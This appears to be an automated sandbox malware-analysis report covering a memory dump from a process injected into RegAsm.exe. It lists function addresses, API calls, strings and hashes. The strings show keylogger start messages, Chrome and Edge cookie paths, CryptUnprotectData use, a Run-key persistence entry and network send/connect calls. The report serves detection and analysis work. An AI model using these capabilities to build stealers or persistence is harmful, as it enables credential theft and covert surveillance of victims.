                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                  • String ID: *?$.
                                  • API String ID: 2812119850-3972193922
                                  • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                  • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                  • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                  • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                  Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountEventTick
                                  • String ID: !D@$NG
                                  • API String ID: 180926312-2721294649
                                  • Opcode ID: c9ce5fe4b700c23384727500752ca22de78a476bceab64b48e8ba843591519b4
                                  • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                  • Opcode Fuzzy Hash: c9ce5fe4b700c23384727500752ca22de78a476bceab64b48e8ba843591519b4
                                  • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                  Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                    • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileKeyboardLayoutNameconnectsend
                                  • String ID: XQG$NG$PG
                                  • API String ID: 1634807452-3565412412
                                  • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                  • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                  • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                  • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                  Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                  • _free.LIBCMT ref: 004435E0
                                  • _free.LIBCMT ref: 004435EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$FileModuleName
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  • API String ID: 2506810119-1068371695
                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                  Function 0044B89F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                  • GetLastError.KERNEL32 ref: 0044B9B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                  • String ID: PkGNG
                                  • API String ID: 2456169464-263838557
                                  • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                  • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                  • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                  • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                  • String ID: /sort "Visit Time" /stext "$0NG
                                  • API String ID: 368326130-3219657780
                                  • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                  • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                  • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                  • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                  Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 00416330
                                    • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                    • Part of subcall function 004138B2: RegSetValueExA.ADVAPI32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                    • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                    • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcslen$CloseCreateValue
                                  • String ID: !D@$okmode$PG
                                  • API String ID: 3411444782-3370592832
                                  • Opcode ID: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                  • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                  • Opcode Fuzzy Hash: 33c7808d8a7b0bded71eafecf17113fbf2925580b38271ada3cd576753f1e43b
                                  • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                  Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                  Strings
                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                  • API String ID: 1174141254-1980882731
                                  • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                  • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                  Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                  Strings
                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                  • API String ID: 1174141254-1980882731
                                  • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                  • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                  Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread$LocalTimewsprintf
                                  • String ID: Offline Keylogger Started
                                  • API String ID: 465354869-4114347211
                                  • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                  • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                  Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread$LocalTime$wsprintf
                                  • String ID: Online Keylogger Started
                                  • API String ID: 112202259-1258561607
                                  • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                  • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                  Function 0044BDEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • CloseHandle.KERNEL32(00000000,00000000,0040F3F6,?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE42
                                  • GetLastError.KERNEL32(?,0044BD0A,0040F3F6,0046EBC0,0000000C), ref: 0044BE4C
                                  • __dosmaperr.LIBCMT ref: 0044BE77
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorHandleLast__dosmaperr
                                  • String ID: (X
                                  • API String ID: 2583163307-1293508174
                                  • Opcode ID: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                  • Instruction ID: c640735ad7e51643fe6b0a0a71fefea3e0d0f945221813f090adf85c72c27ea1
                                  • Opcode Fuzzy Hash: ab3bdfcabf878abbb2a2aeea4d5a33dbce79a0e4a90767e54580a22618b404bc
                                  • Instruction Fuzzy Hash: AC01483260066866E624623858457BF6789CBC2739F35022FFE18872C3DF6CCC8181D9
                                  Function 0041B580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LocalTime
                                  • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                  • API String ID: 481472006-3277280411
                                  • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                  • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$EventLocalThreadTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 2532271599-1507639952
                                  • Opcode ID: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                  • Opcode Fuzzy Hash: a02ae91ac195284b5da0ea0fcd2ef2636c7927f14dee073a7222123f061fd718
                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                  Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: CryptUnprotectData$crypt32
                                  • API String ID: 2574300362-2380590389
                                  • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                  • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                  • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                  • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                  Function 0044C2D3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C382,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C30C
                                  • GetLastError.KERNEL32 ref: 0044C316
                                  • __dosmaperr.LIBCMT ref: 0044C31D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer__dosmaperr
                                  • String ID: PkGNG
                                  • API String ID: 2336955059-263838557
                                  • Opcode ID: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                  • Instruction ID: 8193a85edd99f1e073baf55791db2896ff72ac9ff19ac05387a69161c0de0417
                                  • Opcode Fuzzy Hash: 97215d8b8c2dce734124090270f13308d8b04423b03663272671d6b8c31aea6f
                                  • Instruction Fuzzy Hash: FB019032A11108BBDB01DFDDDC4586E7B19EB81320B28034EFD2097280EAB4DD119794
                                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandleObjectSingleWait
                                  • String ID: Connection Timeout
                                  • API String ID: 2055531096-499159329
                                  • Opcode ID: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                  • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                  • Opcode Fuzzy Hash: 638b915a1fb33ffee36d9cd6321bbf62091d502496d276d1835a730be56b6213
                                  • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                  Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                  Download Yara Rule
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Exception@8Throw
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 2005118841-1866435925
                                  • Opcode ID: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                  • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                  • Opcode Fuzzy Hash: e1bdae5122e534e22181349a294e5dd283a76e5484cb2b4dd901af9da0e19607
                                  • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                  Function 0041CB72 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB9A
                                  • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FormatFreeLocalMessage
                                  • String ID: @J@$PkGNG
                                  • API String ID: 1427518018-1416487119
                                  • Opcode ID: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                  • Instruction ID: 923000db8f6a2d31ebee0df48ef62036c6bc2ff20d3f060cbaedccf048ea6ec3
                                  • Opcode Fuzzy Hash: 43e67b6722ad7e97e4d7411bd93802a0b45ac2c2c041eafaafa940aa2d942fec
                                  • Instruction Fuzzy Hash: 34F0A930B00219A6DF14A766DC4ADFF772DDB44305B10407FB605B21D1DE785D059659
                                  Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041385A
                                  • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,6CA37450,?), ref: 00413888
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,6CA37450,?,?,?,?,?,0040CFE5,?,00000000), ref: 00413893
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413858
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                  • API String ID: 1818849710-1051519024
                                  • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                  • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                  • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                  • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                  Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                    • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                  • String ID: bad locale name
                                  • API String ID: 3628047217-1405518554
                                  • Opcode ID: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                  • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                  • Opcode Fuzzy Hash: 0e967f5f4c551f764c071b3c3fecd2d0a166eebc37c8bba363630da575d49789
                                  • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                  Function 004137AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                  • RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                  • RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateValue
                                  • String ID: Control Panel\Desktop
                                  • API String ID: 1818849710-27424756
